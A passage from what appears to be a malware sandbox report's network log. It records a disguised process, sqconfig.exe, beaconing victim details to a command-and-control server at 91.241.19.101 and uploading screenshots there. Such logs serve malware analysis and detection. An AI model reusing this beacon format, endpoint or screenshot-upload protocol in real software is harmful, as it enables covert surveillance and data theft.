                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:01.706198931 CEST8804OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:01.818747044 CEST8808OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:01.818795919 CEST8810OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:53:01.818819046 CEST8823OUTData Raw: b2 8a d8 b8 60 6a b6 6a f8 e9 80 f0 be 8d fe e9 af 3a 8d bf 7a 9f ef 0a eb fc 75 e2 3d 2b 56 b4 b1 b5 d2 8b 98 ad c1 fb cb 8a e1 d6 52 92 23 76 07 26 b9 30 ed aa 56 6b 5d 4f 6e 70 f7 d7 5d 8f 72 f1 11 db 67 a6 7f d7 01 fc 85 73 e4 e6 96 7f 88 5e
                                                                  Data Ascii: `jj:zu=+VR#v&0Vk]Onp]rgs^Kk*17!-7N.JG8Xb8oxk7Qv7?+i:GwS]zI\3?(?jNP):);CsR3r
                                                                  Sep 30, 2021 23:53:02.140652895 CEST8874INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  38192.168.2.34981191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:01.770476103 CEST8805OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:01.973840952 CEST8860INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  39192.168.2.34981391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:02.207902908 CEST8901OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:02.395589113 CEST8939INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.34976391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:50.250510931 CEST7147OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:50.461033106 CEST7147INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  40192.168.2.34981591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:02.511099100 CEST8941OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:02.511224985 CEST8941OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:02.511508942 CEST8951OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:02.511750937 CEST8954OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:02.638145924 CEST8959OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:02.638195038 CEST8961OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:02.638210058 CEST8964OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:02.638231039 CEST8975OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:02.638252020 CEST8976OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:02.638298988 CEST8981OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:02.765892982 CEST8988OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:02.976473093 CEST9039INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  41192.168.2.34981691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:02.627756119 CEST8956OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:02.817513943 CEST9032INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  42192.168.2.34982291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:03.072541952 CEST9045OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:03.271295071 CEST9108INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  43192.168.2.34982491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:03.315079927 CEST9159OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:03.315223932 CEST9159OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:03.315432072 CEST9169OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:03.315751076 CEST9172OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:03.441699028 CEST9283OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:03.441915035 CEST9289OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:03.441987038 CEST9292OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:03.442183018 CEST9300OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:03.442502022 CEST9301OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:03.442609072 CEST9306OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:03.570600986 CEST9348OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:03.754144907 CEST9386INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  44192.168.2.34982791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:03.506822109 CEST9319OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:03.716332912 CEST9386INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  45192.168.2.34983191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:03.971726894 CEST9394OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:04.195410013 CEST9410INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  46192.168.2.34983291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:04.123554945 CEST9394OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
